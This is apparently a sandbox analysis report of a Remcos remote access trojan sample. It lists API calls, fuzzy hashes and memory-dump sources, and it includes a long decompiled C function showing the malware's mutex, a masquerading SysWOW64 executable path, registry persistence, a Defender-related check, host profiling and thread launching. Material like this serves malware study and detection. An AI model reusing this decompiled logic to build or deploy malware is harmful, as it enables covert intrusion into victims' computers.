                                          • Instruction ID: 5fa9d90cb8be4f3930b06c8b0122489401ffe22f77aad5cdb7e0e5ab13402fbc
                                          • Opcode Fuzzy Hash: dc77e667257af7b5de05517ff536dae1ad9cd995fdb6c6a3c9126bbe164289b7
                                          • Instruction Fuzzy Hash: 833194A1800255BACB10FBA6CC09DBFBBBCAF95709F04046FF941A21D2EA7C9945D764
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00410885: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004108A5
                                            • Part of subcall function 00410885: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,0046C518), ref: 004108C3
                                            • Part of subcall function 00410885: RegCloseKey.KERNELBASE(?), ref: 004108CE
                                          • Sleep.KERNELBASE(00000BB8), ref: 0040D169
                                          • ExitProcess.KERNEL32 ref: 0040D1DE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseExitOpenProcessQuerySleepValue
                                          • String ID: 3.2.1 Pro$override$pth_unenc
                                          • API String ID: 2281282204-2083519672
                                          • Opcode ID: 05ea415e688babb82103080c69336f853dd6c1ec8a960b799ff37d6a8991d508
                                          • Instruction ID: 08f4d26337d929cf8c522b5db6824f2b5f74010f43e1cc258f687c08e2209bf0
                                          • Opcode Fuzzy Hash: 05ea415e688babb82103080c69336f853dd6c1ec8a960b799ff37d6a8991d508
                                          • Instruction Fuzzy Hash: 45212731F443012BD608B6B68C57B6F32969B80708F10042FB8066B2D2FEBDDA45879F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00000000,00000001,?,0042E381,00000024,?,00000000,?), ref: 0042E5DF
                                          • CryptGenRandom.ADVAPI32(00000000,00000000,?,?,0042E381,00000024,?,00000000,?,?,?,?,?,?,?,00428BA3), ref: 0042E5F4
                                          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,0042E381,00000024,?,00000000,?,?,?,?,?,?,?,00428BA3,?), ref: 0042E606
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Crypt$Context$AcquireRandomRelease
                                          • String ID:
                                          • API String ID: 1815803762-0
                                          • Opcode ID: be640132c4cc09921de464d7efa084b83adc683f71156fedcc3855f66cb2cb71
                                          • Instruction ID: 38117f8ee5779777ede6d5b7ba3ea51b7ecd80fb833ca9539c352c605c5c0cae
                                          • Opcode Fuzzy Hash: be640132c4cc09921de464d7efa084b83adc683f71156fedcc3855f66cb2cb71
                                          • Instruction Fuzzy Hash: 46F06D31318324BBEB310F56FC19F573E99EB81BA6FA00536F209E50E4E6628940865C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetComputerNameExW.KERNEL32(00000001,?,00000028,0046C578), ref: 00416DBB
                                          • GetUserNameW.ADVAPI32(?,00000037), ref: 00416DD3
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Name$ComputerUser
                                          • String ID:
                                          • API String ID: 4229901323-0
                                          • Opcode ID: be6cad12c344e77614ab7161f93b502ddfc4643f3128554765fcc8d2a5d5d92a
                                          • Instruction ID: 97ef4402937901d3963fe518a4296ad78cd3b90a883e9fb2300271c61e114a9f
                                          • Opcode Fuzzy Hash: be6cad12c344e77614ab7161f93b502ddfc4643f3128554765fcc8d2a5d5d92a
                                          • Instruction Fuzzy Hash: 38014F7190011CABCB00EB90DC45EDDB7BCEF44305F10016AF905B2196EEB46A898B98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: recv
                                          • String ID:
                                          • API String ID: 1507349165-0
                                          • Opcode ID: 770d8840f0cfa992c73ee2df09c2a5214786fe1339814540061c585bff84fad7
                                          • Instruction ID: e48ef5bedcc115dfdcbe715373a672fa69d6f329cf61ba9e4e3f48fb4f6a798c
                                          • Opcode Fuzzy Hash: 770d8840f0cfa992c73ee2df09c2a5214786fe1339814540061c585bff84fad7
                                          • Instruction Fuzzy Hash: 9DC02B3900420CBFCF011FA0CD0CCBD3FADD7443517008024F90102251C533C62097A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetUnhandledExceptionFilter.KERNELBASE(Function_0002F8C5,0042F5A8), ref: 0042F8BE
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: e558ee6a599fcacb4150c7bdc9a2a2691efb109ccac4c0442e4bfa04ac03d4bd
                                          • Instruction ID: 86e206407557d0ac1bda88e2f45e42cbf33a4e9732861bd4a6740e282559d687
                                          • Opcode Fuzzy Hash: e558ee6a599fcacb4150c7bdc9a2a2691efb109ccac4c0442e4bfa04ac03d4bd
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3b70316521038a8c364eb9b4d2c8532403025d820ed2247955e782ac66748b0c
                                          • Instruction ID: 49bedcb936ec6ce3924db17fa1c14752e1e0bec2c1eaa22c03ee826eb31dc35c
                                          • Opcode Fuzzy Hash: 3b70316521038a8c364eb9b4d2c8532403025d820ed2247955e782ac66748b0c
                                          • Instruction Fuzzy Hash: F022F371A012199BDF15CF68C8907EEB7B1EF44314F18416BEC55AB382DB389E81CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 89%
                                          			E0040C2BE(void* __edx, void* __eflags, intOrPtr _a4, char* _a12) {
                                          				char _v524;
                                          				char _v700;
                                          				char _v720;
                                          				char _v724;
                                          				char _v728;
                                          				char _v744;
                                          				char _v756;
                                          				char _v760;
                                          				char _v772;
                                          				struct _SECURITY_ATTRIBUTES* _v776;
                                          				signed int _v780;
                                          				char _v784;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				void* _t71;
                                          				void* _t78;
                                          				void** _t86;
                                          				void* _t87;
                                          				void* _t90;
                                          				CHAR* _t93;
                                          				long _t95;
                                          				int _t97;
                                          				char _t100;
                                          				void* _t101;
                                          				void* _t105;
                                          				void* _t121;
                                          				void* _t122;
                                          				void* _t129;
                                          				char _t135;
                                          				char* _t137;
                                          				signed char* _t139;
                                          				signed char* _t141;
                                          				void* _t144;
                                          				void* _t146;
                                          				void* _t160;
                                          				void* _t163;
                                          				intOrPtr _t165;
                                          				void* _t166;
                                          				intOrPtr _t182;
                                          				intOrPtr* _t185;
                                          				void* _t187;
                                          				void* _t193;
                                          				char* _t196;
                                          				void* _t199;
                                          				char* _t203;
                                          				void* _t210;
                                          				signed short* _t214;
                                          				void* _t215;
                                          				void* _t216;
                                          				signed int _t217;
                                          				CHAR* _t224;
                                          				void* _t226;
                                          				char* _t229;
                                          				char* _t231;
                                          				intOrPtr* _t233;
                                          				void* _t235;
                                          				intOrPtr* _t240;
                                          				intOrPtr* _t244;
                                          				void* _t246;
                                          				void* _t254;
                                          				void* _t265;
                                          				void* _t268;
                                          				struct _SECURITY_ATTRIBUTES* _t269;
                                          				int _t272;
                                          				char* _t360;
                                          				signed int _t382;
                                          				signed int _t386;
                                          				int _t388;
                                          				signed int _t394;
                                          				signed int _t397;
                                          				intOrPtr _t423;
                                          				void* _t433;
                                          				void* _t435;
                                          				signed int _t452;
                                          				void* _t455;
                                          				char* _t461;
                                          				void* _t462;
                                          				char* _t465;
                                          				void* _t467;
                                          				void* _t472;
                                          				char* _t477;
                                          				intOrPtr* _t481;
                                          				void* _t484;
                                          				void* _t485;
                                          				void* _t486;
                                          				signed int _t492;
                                          				void* _t495;
                                          				void* _t496;
                                          				void* _t497;
                                          				void* _t499;
                                          				void* _t501;
                                          				void* _t502;
                                          				void* _t506;
                                          
                                          				_t444 = __edx;
                                          				 *0x46bd28 = _a4;
                                          				_push(_t268);
                                          				L0040CC55( &_v724, __edx, __eflags);
                                          				_t495 = (_t492 & 0xfffffff8) - 0x2f4;
                                          				E004020EC(_t268, _t495, __edx, __eflags, 0x46c59c);
                                          				_t496 = _t495 - 0x18;
                                          				E004020EC(_t268, _t496, __edx, __eflags,  &_v728);
                                          				_t71 = E00417478( &_v756, __edx); // executed
                                          				_t497 = _t496 + 0x30;
                                          				E0040D458(__edx, _t71);
                                          				L00401E74( &_v760, __edx);
                                          				_t284 = _a12;
                                          				if( *_a12 != 0x2d) {
                                          					L6:
                                          					_t461 = 0x46c578;
                                          					__eflags =  *((char*)(L00401F95(L00401E49(0x46c578, _t444, __eflags, 3))));
                                          					 *0x46bb01 = __eflags != 0;
                                          					_t78 = E00405343(_t268,  &_v756, E004075E6( &_v780, "Software\\", __eflags, L00401E49(0x46c578, _t444, __eflags, 0xe)), 0x46c578, __eflags, "\\");
                                          					_t471 = 0x46c518;
                                          					E00401FD1(0x46c518, _t77, 0x46c518, _t78);
                                          					E00401FC7();
                                          					E00401FC7();
                                          					L00405A0B(_t268, 0x46c5cc, "Exe");
                                          					_t269 = 0;
                                          					L00401E49(0x46c578, _t77, __eflags, 0x32);
                                          					__eflags =  *(E00405220(0));
                                          					 *0x46bd4e = __eflags != 0;
                                          					L00401E49(0x46c578, _t77, __eflags, 0x33);
                                          					_t86 = E00405220(0);
                                          					__eflags =  *_t86;
                                          					 *0x46bd4f =  *_t86 != 0;
                                          					__eflags =  *0x46bd4e - _t269; // 0x0
                                          					if(__eflags == 0) {
                                          						L8:
                                          						_v776 = _t269;
                                          						_t87 = OpenMutexA(0x100000, _t269, "Remcos_Mutex_Inj"); // executed
                                          						_t472 = _t87;
                                          						__eflags = _t472;
                                          						if(_t472 != 0) {
                                          							WaitForSingleObject(_t472, 0xea60);
                                          							CloseHandle(_t472);
                                          						}
                                          						_t447 = L00401F95(0x46c518); // executed
                                          						_t90 = E00410885(_t89, "Inj",  &_v776); // executed
                                          						__eflags = _t90;
                                          						if(__eflags != 0) {
                                          							_t447 = L00401F95(0x46c518);
                                          							L00410CE2(_t259, __eflags, "Inj");
                                          						}
                                          						L00401FAD(0x46c548, L00401E49(_t461, _t447, __eflags, 0xe));
                                          						_t93 = L00401F95(0x46c548);
                                          						_t462 = 0;
                                          						_t272 = 1;
                                          						CreateMutexA(0, 1, _t93); // executed
                                          						_t95 = GetLastError();
                                          						__eflags = _t95 - 0xb7;
                                          						if(_t95 == 0xb7) {
                                          							L45:
                                          							E00401FC7();
                                          							_t97 = _t272;
                                          							goto L5;
                                          						} else {
                                          							E0040CD09();
                                          							GetModuleFileNameW(0, "C:\Windows\SysWOW64\logagent.exe", 0x104);
                                          							_t100 = E00417614(0x46c548);
                                          							_push(0x46c548);
                                          							_t448 = 0x80000002;
                                          							 *0x46beb4 = _t100;
                                          							_t101 = E004108E2( &_v772, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName"); // executed
                                          							_t499 = _t497 + 0xc;
                                          							E00401FD1(0x46c5b4, 0x80000002, 0x46c5b4, _t101);
                                          							E00401FC7();
                                          							__eflags =  *0x46beb4;
                                          							if( *0x46beb4 == 0) {
                                          								_push(" (32 bit)");
                                          							} else {
                                          								_push(" (64 bit)");
                                          							}
                                          							L00405A02(_t272, 0x46c5b4, _t462);
                                          							_t105 =  *0x46bd20;
                                          							__eflags = _t105;
                                          							if(_t105 != 0) {
                                          								 *0x46a9d0 =  *_t105();
                                          							}
                                          							_t477 = 0x46c578;
                                          							__eflags = _v776 - _t462;
                                          							if(__eflags == 0) {
                                          								_t433 = L00401E49(0x46c578, _t448, __eflags, 0x2e);
                                          								__eflags =  *((char*)(L00401F95(_t433)));
                                          								if(__eflags != 0) {
                                          									__eflags =  *0x46bd20 - _t462; // 0x7536e630
                                          									if(__eflags != 0) {
                                          										__eflags =  *0x46a9d0 - _t462; // 0x1
                                          										if(__eflags == 0) {
                                          											_t448 = L00401F95(0x46c518);
                                          											_t254 = E0041083B(0x46c518, _t253, "origmsc");
                                          											_pop(_t435);
                                          											__eflags = _t254;
                                          											if(__eflags == 0) {
                                          												L00405F77(_t272, _t435, _t448);
                                          											}
                                          										} else {
                                          											_push(_t433);
                                          											_push(_t433);
                                          											__eflags = E0040A713() - 0xffffffff;
                                          											if(__eflags == 0) {
                                          												E00406071(__eflags);
                                          											}
                                          										}
                                          									}
                                          								}
                                          							}
                                          							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 0x27))));
                                          							if(__eflags != 0) {
                                          								E0040D3F7();
                                          							}
                                          							L00409DC9(_t272, 0x46c4e8, L00401F95(L00401E49(_t477, _t448, __eflags, 0xb)));
                                          							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 4))));
                                          							 *0x46bb02 = __eflags != 0;
                                          							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 5))));
                                          							 *0x46bafb = __eflags != 0;
                                          							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 8))));
                                          							 *0x46bb00 = __eflags != 0;
                                          							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 3))));
                                          							if(__eflags != 0) {
                                          								_t240 = L00401F95(L00401E49(_t477, _t448, __eflags, 0x30));
                                          								_t25 = _t240 + 2; // 0x2
                                          								_t448 = _t25;
                                          								do {
                                          									_t423 =  *_t240;
                                          									_t240 = _t240 + 2;
                                          									__eflags = _t423 - _t462;
                                          								} while (_t423 != _t462);
                                          								__eflags = _t240 - _t448;
                                          								if(__eflags != 0) {
                                          									_t244 = L00401F95(L00401E49(_t477, _t448, __eflags, 9));
                                          									_t246 = L00401F95(L00401E49(0x46c578, _t448, __eflags, 0x30));
                                          									_t448 =  *_t244;
                                          									L00401EFA(0x46c530,  *_t244, _t244, E0041805B( &_v780,  *_t244, _t246));
                                          									L00401EF0();
                                          									_t477 = 0x46c578;
                                          								}
                                          							}
                                          							__eflags = _v776 - _t462;
                                          							if(_v776 != _t462) {
                                          								L00431F00(_t462,  &_v524, _t462, 0x208);
                                          								_t121 = E00402489();
                                          								_t122 = L00401F95(0x46c560);
                                          								_t449 = L00401F95(0x46c518);
                                          								E00410A30(_t124, "exepath",  &_v524, 0x208, _t122, _t121);
                                          								_t501 = _t499 + 0x20;
                                          								L00409DC9(_t272, 0x46c500,  &_v524);
                                          								_t465 = 0x46c578;
                                          								goto L47;
                                          							} else {
                                          								__eflags =  *0x46bb01;
                                          								if(__eflags == 0) {
                                          									L00409DC9(_t272, 0x46c500, "C:\Windows\SysWOW64\logagent.exe");
                                          								} else {
                                          									_t229 = L00401F95(L00401E49(_t477, _t448, __eflags, 0x1e));
                                          									_t231 = L00401F95(L00401E49(_t477, _t448, __eflags, 0xc));
                                          									_t233 = L00401F95(L00401E49(0x46c578, _t448, __eflags, 9));
                                          									__eflags =  *_t229;
                                          									__eflags =  *_t231;
                                          									_t477 = 0x46c578;
                                          									_t235 = L00401F95(L00401E49(0x46c578, _t448,  *_t231, 0xa));
                                          									L0040A987( *_t233, L00401F95(L00401E49(0x46c578, _t448, __eflags, 0x30)), _t235, ((_t232 & 0xffffff00 |  *_t229 != 0x00000000) & 0 | __eflags != 0x00000000) & 0x000000ff, (_t232 & 0xffffff00 |  *_t229 != 0x00000000) & 0x000000ff);
                                          									_t499 = _t499 + 0xc;
                                          									_t272 = 1;
                                          									_t462 = 0;
                                          								}
                                          								_t210 = E00402489();
                                          								_t452 = 2;
                                          								_t394 =  ~(0 | __eflags > 0x00000000) | (_t210 + 0x00000001) * _t452;
                                          								_push(_t394);
                                          								_v780 = _t394;
                                          								_t486 = E0042F4C6(_t394, (_t210 + 1) * _t452 >> 0x20, _t477, __eflags);
                                          								__eflags = _t486;
                                          								if(_t486 == 0) {
                                          									_t486 = _t462;
                                          								} else {
                                          									L00431F00(_t462, _t486, _t462, _v780);
                                          									_t499 = _t499 + 0xc;
                                          								}
                                          								_t214 = L00401EEB(0x46c500);
                                          								_t455 = _t486 - _t214;
                                          								__eflags = _t455;
                                          								_t467 = 2;
                                          								do {
                                          									_t397 =  *_t214 & 0x0000ffff;
                                          									 *(_t214 + _t455) = _t397;
                                          									_t214 = _t214 + _t467;
                                          									__eflags = _t397;
                                          								} while (_t397 != 0);
                                          								_push(_t397);
                                          								_t215 = E00402489();
                                          								_t216 = L00401F95(0x46c560);
                                          								_t217 = E00402489();
                                          								E00410C80(L00401F95(0x46c518), __eflags, "exepath", _t486, 2 + _t217 * 2, _t216, _t215); // executed
                                          								E0042F4CF(_t486);
                                          								_t501 = _t499 + 0x1c;
                                          								_t465 = 0x46c578;
                                          								L00401E49(0x46c578, _t219, __eflags, 0xd);
                                          								_t449 = "0";
                                          								__eflags = L0040EAD9(__eflags);
                                          								if(__eflags == 0) {
                                          									L47:
                                          									_push(_t272);
                                          									_t129 = L00401F95(L00401E49(_t465, _t449, __eflags, 0x34));
                                          									_t502 = _t501 - 0x18;
                                          									E00402084(_t272, _t502, _t129);
                                          									_push("licence");
                                          									_t450 = L00401F95(0x46c518); // executed
                                          									E00410AA7(0x46c518, _t131); // executed
                                          									_t497 = _t502 + 0x20;
                                          									_t135 = E00436769(_t133, L00401F95(L00401E49(_t465, _t131, __eflags, 0x28)));
                                          									 *0x46bb03 = _t135;
                                          									__eflags = _t135 - 2;
                                          									if(_t135 != 2) {
                                          										__eflags = _t135 - _t272;
                                          										if(__eflags == 0) {
                                          											_t388 = 0;
                                          											__eflags = 0;
                                          											goto L51;
                                          										}
                                          									} else {
                                          										_t388 = _t272;
                                          										L51:
                                          										L00418F59(_t272, _t388, _t450);
                                          										__eflags = 0;
                                          										CreateThread(0, 0,  &M00418D28, 0, 0, 0);
                                          									}
                                          									_t137 = L00401F95(L00401E49(_t465, _t450, __eflags, 0x37));
                                          									_t139 = L00401F95(L00401E49(_t465, _t450, __eflags, 0x10));
                                          									_t141 = L00401F95(L00401E49(_t465, _t450, __eflags, 0xf));
                                          									__eflags =  *_t137;
                                          									_t471 = 0x46c578;
                                          									_t144 = E00436769(_t142, L00401F95(L00401E49(0x46c578, _t450,  *_t137, 0x36)));
                                          									_t146 = L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x11));
                                          									E0040846D(_t139,  *_t141 & 0x000000ff,  *_t139 & 0x000000ff, L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x31)), _t146, _t144, (_t140 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff); // executed
                                          									__eflags =  *((intOrPtr*)(L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x14)))) - 1;
                                          									if(__eflags != 0) {
                                          										_t461 = CreateThread;
                                          									} else {
                                          										_t199 = 2;
                                          										_t485 = E0042F218(_t450, 0x46c578, __eflags, _t199);
                                          										 *_t485 = 0;
                                          										_t386 = L00401E49(0x46c578, _t450, __eflags, 0x35);
                                          										_t203 = L00401F95(_t386);
                                          										_t461 = CreateThread;
                                          										__eflags =  *_t203;
                                          										 *((char*)(_t485 + 1)) = _t386 & 0xffffff00 | __eflags != 0x00000000;
                                          										CreateThread(0, 0, E00415938, _t485, 0, 0);
                                          										_t471 = 0x46c578;
                                          									}
                                          									__eflags =  *((intOrPtr*)(L00401F95(L00401E49(_t471, _t450, __eflags, 0x16)))) - 1;
                                          									if(__eflags == 0) {
                                          										_t193 = 2;
                                          										_t484 = E0042F218(_t450, _t471, __eflags, _t193);
                                          										 *_t484 = 1;
                                          										_t382 = L00401E49(0x46c578, _t450, __eflags, 0x35);
                                          										_t196 = L00401F95(_t382);
                                          										__eflags =  *_t196;
                                          										__eflags = 0;
                                          										 *((char*)(_t484 + 1)) = _t382 & 0xffffff00 |  *_t196 != 0x00000000;
                                          										CreateThread(0, 0, E00415938, _t484, 0, 0);
                                          										_t471 = 0x46c578;
                                          									}
                                          									__eflags =  *((intOrPtr*)(L00401F95(L00401E49(_t471, _t450, __eflags, 0x23)))) - 1;
                                          									if(__eflags == 0) {
                                          										 *0x46ba75 = 1;
                                          										_t185 = L00401F95(L00401E49(_t471, _t450, __eflags, 0x25));
                                          										_t187 = L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x26));
                                          										_t450 =  *_t185;
                                          										L00401EFA(0x46c0e0,  *_t185, _t185, E0041800F( &_v780,  *_t185, _t187));
                                          										L00401EF0();
                                          										__eflags = 0;
                                          										CreateThread(0, 0, 0x401bcd, 0, 0, 0);
                                          										_t471 = 0x46c578;
                                          									}
                                          									__eflags =  *((intOrPtr*)(L00401F95(L00401E49(_t471, _t450, __eflags, 0x2b)))) - 1;
                                          									if(__eflags == 0) {
                                          										_t471 = L00401F95(L00401E49(_t471, _t450, __eflags, 0x2c));
                                          										_t182 = E00436769(_t180, L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x2d)));
                                          										__eflags =  *_t471;
                                          										_t450 = _t182;
                                          										__eflags =  *_t471 != 0;
                                          										E0040A679(_t182);
                                          									}
                                          									_t160 = E00416D9E( &_v772, _t461, __eflags); // executed
                                          									L00401EFA(0x46c584, _t450, _t471, _t160);
                                          									_t360 =  &_v776;
                                          									L00401EF0();
                                          									_t163 =  *0x46bd14;
                                          									_t269 = 0;
                                          									__eflags = _t163;
                                          									if(_t163 != 0) {
                                          										 *_t163(0); // executed
                                          									}
                                          									CreateThread(_t269, _t269, E0040D0B5, _t269, _t269, _t269); // executed
                                          									__eflags =  *0x46bd4e;
                                          									if( *0x46bd4e != 0) {
                                          										CreateThread(_t269, _t269, 0x40fac7, _t269, _t269, _t269);
                                          									}
                                          									__eflags =  *0x46bd4f;
                                          									if( *0x46bd4f != 0) {
                                          										CreateThread(_t269, _t269, 0x40ffe5, _t269, _t269, _t269);
                                          									}
                                          									_t165 =  *0x46a9d0; // 0x1
                                          									_t166 = _t165 - _t269;
                                          									__eflags = _t166;
                                          									if(__eflags == 0) {
                                          										goto L71;
                                          									} else {
                                          										__eflags = _t166 - 1;
                                          										if(__eflags == 0) {
                                          											_push("Administrator");
                                          											goto L72;
                                          										}
                                          									}
                                          									goto L73;
                                          								} else {
                                          									_t224 = L00401E49(0x46c578, "0", __eflags, 0xd);
                                          									_t506 = _t501 - 0x18;
                                          									_t449 = _t224;
                                          									E004172DA(_t506, _t224);
                                          									_t226 = L0040CE44(__eflags);
                                          									_t501 = _t506 + 0x18;
                                          									__eflags = _t226 - _t272;
                                          									if(__eflags != 0) {
                                          										goto L47;
                                          									} else {
                                          										_t272 = 3;
                                          										goto L45;
                                          									}
                                          								}
                                          							}
                                          						}
                                          					} else {
                                          						_v780 = 0;
                                          						_t265 = E00410885(L00401F95(0x46c518), "WD",  &_v780);
                                          						__eflags = _t265;
                                          						if(_t265 != 0) {
                                          							L00410CE2(L00401F95(0x46c518), __eflags, "WD");
                                          							L0040FD95();
                                          							L71:
                                          							_push("User");
                                          							L72:
                                          							E004075C2(_t269, _t497 - 0x18, "Access level: ", _t461, __eflags, E00402084(_t269,  &_v776));
                                          							E00402084(_t269, _t497 - 4, "[Info]");
                                          							L00416C80(_t269, _t461);
                                          							_t360 =  &_v784;
                                          							E00401FC7(); // executed
                                          							L73:
                                          							E00411929(); // executed
                                          							asm("int3");
                                          							_push(_t471);
                                          							_t481 = _t360 + 0x68;
                                          							E0040D515(_t481);
                                          							_t284 = _t481;
                                          							 *_t284 = 0x460788;
                                          							 *_t284 = 0x460744;
                                          							return E004304F6(_t284);
                                          						} else {
                                          							goto L8;
                                          						}
                                          					}
                                          				} else {
                                          					__eflags =  *((char*)(__ecx + 1)) - 0x6c;
                                          					if(__eflags != 0) {
                                          						goto L6;
                                          					} else {
                                          						__eax =  *(__ecx + 2) & 0x000000ff;
                                          						__eflags = __al;
                                          						if(__eflags != 0) {
                                          							goto L6;
                                          						} else {
                                          							_push(__ecx);
                                          							_push(__ecx);
                                          							__ecx =  &_v700;
                                          							__eax = E0040D544( &_v700, __edx, __eflags, "license_code.txt", 2);
                                          							__ecx = 0x46c578;
                                          							__ecx = L00401E49(0x46c578, __edx, __eflags, 0x34);
                                          							__edx = __eax;
                                          							__ecx =  &_v720;
                                          							__eax = E0040E8BB( &_v720, __edx, __eflags);
                                          							__ecx =  &_v720;
                                          							__eax = E0040D4F5( &_v720, __edx, __eflags);
                                          							__ecx =  &_v720;
                                          							L74();
                                          							__ecx =  &_v744;
                                          							E00401FC7() = 0;
                                          							__eax = 1;
                                          							__eflags = 1;
                                          							L5:
                                          							return _t97;
                                          						}
                                          					}
                                          				}
                                          			}

                                          0x0040c689
                                          0x0040c68c
                                          0x0040c68c
                                          0x0040c68f
                                          0x0040c692
                                          0x0040c692
                                          0x0040c697
                                          0x0040c69b
                                          0x0040c6a8
                                          0x0040c6bd
                                          0x0040c6c2
                                          0x0040c6d5
                                          0x0040c6de
                                          0x0040c6e3
                                          0x0040c6e3
                                          0x0040c69b
                                          0x0040c6e8
                                          0x0040c6ec
                                          0x0040c89c
                                          0x0040c8ab
                                          0x0040c8b3
                                          0x0040c8d1
                                          0x0040c8d3
                                          0x0040c8d8
                                          0x0040c8e8
                                          0x0040c8ed
                                          0x00000000
                                          0x0040c6f2
                                          0x0040c6f2
                                          0x0040c6f9
                                          0x0040c78f
                                          0x0040c6ff
                                          0x0040c70a
                                          0x0040c71c
                                          0x0040c731
                                          0x0040c736
                                          0x0040c73e
                                          0x0040c744
                                          0x0040c75c
                                          0x0040c776
                                          0x0040c77d
                                          0x0040c780
                                          0x0040c781
                                          0x0040c781
                                          0x0040c799
                                          0x0040c7a3
                                          0x0040c7ab
                                          0x0040c7ad
                                          0x0040c7ae
                                          0x0040c7b7
                                          0x0040c7ba
                                          0x0040c7bc
                                          0x0040c7ce
                                          0x0040c7be
                                          0x0040c7c4
                                          0x0040c7c9
                                          0x0040c7c9
                                          0x0040c7d5
                                          0x0040c7de
                                          0x0040c7de
                                          0x0040c7e0
                                          0x0040c7e1
                                          0x0040c7e1
                                          0x0040c7e4
                                          0x0040c7e8
                                          0x0040c7ea
                                          0x0040c7ea
                                          0x0040c7ef
                                          0x0040c7f7
                                          0x0040c7ff
                                          0x0040c80a
                                          0x0040c829
                                          0x0040c82f
                                          0x0040c834
                                          0x0040c837
                                          0x0040c840
                                          0x0040c845
                                          0x0040c851
                                          0x0040c853
                                          0x0040c8f2
                                          0x0040c8f2
                                          0x0040c8fe
                                          0x0040c903
                                          0x0040c909
                                          0x0040c90e
                                          0x0040c91d
                                          0x0040c91f
                                          0x0040c924
                                          0x0040c938
                                          0x0040c943
                                          0x0040c949
                                          0x0040c94b
                                          0x0040c951
                                          0x0040c953
                                          0x0040c955
                                          0x0040c955
                                          0x00000000
                                          0x0040c955
                                          0x0040c94d
                                          0x0040c94d
                                          0x0040c957
                                          0x0040c957
                                          0x0040c95c
                                          0x0040c968
                                          0x0040c968
                                          0x0040c975
                                          0x0040c987
                                          0x0040c999
                                          0x0040c99e
                                          0x0040c9a3
                                          0x0040c9c0
                                          0x0040c9d2
                                          0x0040c9f1
                                          0x0040ca09
                                          0x0040ca0b
                                          0x0040ca54
                                          0x0040ca0d
                                          0x0040ca0f
                                          0x0040ca16
                                          0x0040ca22
                                          0x0040ca29
                                          0x0040ca2b
                                          0x0040ca30
                                          0x0040ca36
                                          0x0040ca48
                                          0x0040ca4b
                                          0x0040ca4d
                                          0x0040ca4d
                                          0x0040ca6a
                                          0x0040ca6c
                                          0x0040ca70
                                          0x0040ca77
                                          0x0040ca81
                                          0x0040ca88
                                          0x0040ca8a
                                          0x0040ca8f
                                          0x0040ca95
                                          0x0040caa1
                                          0x0040caa4
                                          0x0040caa6
                                          0x0040caa6
                                          0x0040cabb
                                          0x0040cabd
                                          0x0040cac3
                                          0x0040cad0
                                          0x0040cae5
                                          0x0040caea
                                          0x0040cafd
                                          0x0040cb06
                                          0x0040cb0b
                                          0x0040cb17
                                          0x0040cb19
                                          0x0040cb19
                                          0x0040cb2e
                                          0x0040cb30
                                          0x0040cb49
                                          0x0040cb58
                                          0x0040cb5d
                                          0x0040cb60
                                          0x0040cb63
                                          0x0040cb66
                                          0x0040cb66
                                          0x0040cb6f
                                          0x0040cb7a
                                          0x0040cb7f
                                          0x0040cb83
                                          0x0040cb88
                                          0x0040cb8d
                                          0x0040cb8f
                                          0x0040cb91
                                          0x0040cb94
                                          0x0040cb94
                                          0x0040cba0
                                          0x0040cba2
                                          0x0040cba9
                                          0x0040cbb5
                                          0x0040cbb5
                                          0x0040cbb7
                                          0x0040cbbe
                                          0x0040cbca
